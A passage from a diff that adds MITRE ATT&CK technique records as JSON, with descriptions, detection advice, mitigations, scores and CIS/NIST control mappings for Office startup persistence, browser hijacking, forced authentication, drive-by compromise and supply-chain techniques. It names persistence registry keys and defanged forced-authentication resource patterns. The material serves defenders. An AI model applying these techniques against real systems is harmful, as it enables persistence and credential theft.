unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1137.002", + "name": "Office Application Startup: Office Test", + "url": "https://attack.mitre.org/techniques/T1137/002", + "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", + "detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1137.003", + "name": "Office Application Startup: Outlook Forms", + "url": "https://attack.mitre.org/techniques/T1137/003", + "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.004", + "name": "Office Application Startup: Outlook Home Page", + "url": "https://attack.mitre.org/techniques/T1137/004", + "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.005", + "name": "Office Application Startup: Outlook Rules", + "url": "https://attack.mitre.org/techniques/T1137/005", + "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.006", + "name": "Office Application Startup: Add-ins", + "url": "https://attack.mitre.org/techniques/T1137/006", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ", + "detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.5448362067371428, + "adjusted_score": 0.5448362067371428, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "2.3,2.7,4.1,4.8,7.1,7.2,7.3,7.4,7.5,7.7,9.4,18.3,18.5" + ], + "nist_controls": [ + "AC-10", + "AC-17", + "AC-6", + "CM-2", + "CM-6", + "CM-8", + "RA-5", + "SC-18", + "SC-44", + "SI-2", + "SI-3", + "SI-4", + "SI-8" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)", + "url": "https://attack.mitre.org/techniques/T1140", + "tactics": [ + "Defense Evasion" + ], + "detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Modification", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.7927028039276189, + "adjusted_score": 0.7927028039276189, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1176", + "name": "Browser Extensions", + "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)", + "url": "https://attack.mitre.org/techniques/T1176", + "tactics": [ + "Persistence" + ], + "detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\n\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Network Traffic: Network Connection Creation", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.517029065012381, + "adjusted_score": 0.517029065012381, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,2.7,4.1,9.4,14.4,18.3,18.5" + ], + "nist_controls": [ + "AC-6", + "CA-7", + "CA-8", + "CM-11", + "CM-2", + "CM-3", + "CM-5", + "CM-6", + "CM-7", + "RA-5", + "SC-7", + "SI-10", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1185", + "name": "Browser Session Hijacking", + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", + "url": "https://attack.mitre.org/techniques/T1185", + "tactics": [ + "Collection" + ], + "detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Logon Session: Logon Session Creation", + "Process: Process Access", + "Process: Process Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.43105835244761903, + "adjusted_score": 0.43105835244761903, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.3,4.7,5.3,6.1,6.2,6.8,14.4" + ], + "nist_controls": [ + "AC-10", + "AC-12", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "IA-2", + "SC-23", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1187", + "name": "Forced Authentication", + "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)", + "url": "https://attack.mitre.org/techniques/T1187", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", + "platforms": [ + "Windows" + ], + "data_sources": [ + "File: File Access", + "File: File Creation", + "File: File Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "cumulative_score": 0.4952476190476191, + "adjusted_score": 0.4952476190476191, + "has_car": true, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,4.7,5.2,7.6,7.7,13.4,18.2,18.3" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1189", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)", + "url": "https://attack.mitre.org/techniques/T1189", + "tactics": [ + "Initial Access" + ], + "detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "platforms": [ + "Linux", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.676563933352381, + "adjusted_score": 0.676563933352381, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.7,7.1,7.2,7.4,7.5,9.1,9.3,9.6,10.5,18.3,18.5" + ], + "nist_controls": [ + "AC-4", + "AC-6", + "CA-7", + "CM-2", + "CM-6", + "CM-8", + "SA-22", + "SC-18", + "SC-2", + "SC-29", + "SC-3", + "SC-30", + "SC-39", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1190", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", + "url": "https://attack.mitre.org/techniques/T1190", + "tactics": [ + "Initial Access" + ], + "detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "platforms": [ + "Containers", + "IaaS", + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + } + ], + "cumulative_score": 1.5121397187695238, + "adjusted_score": 1.5121397187695238, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.12,4.4,4.7,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.6,7.7,10.5,12.1,12.2,12.8,16.13,16.8,18.1,18.2,18.3,13.10" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-2", + "CA-7", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-8", + "RA-10", + "RA-5", + "SA-8", + "SC-18", + "SC-2", + "SC-29", + "SC-3", + "SC-30", + "SC-39", + "SC-46", + "SC-7", + "SI-10", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1195", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: 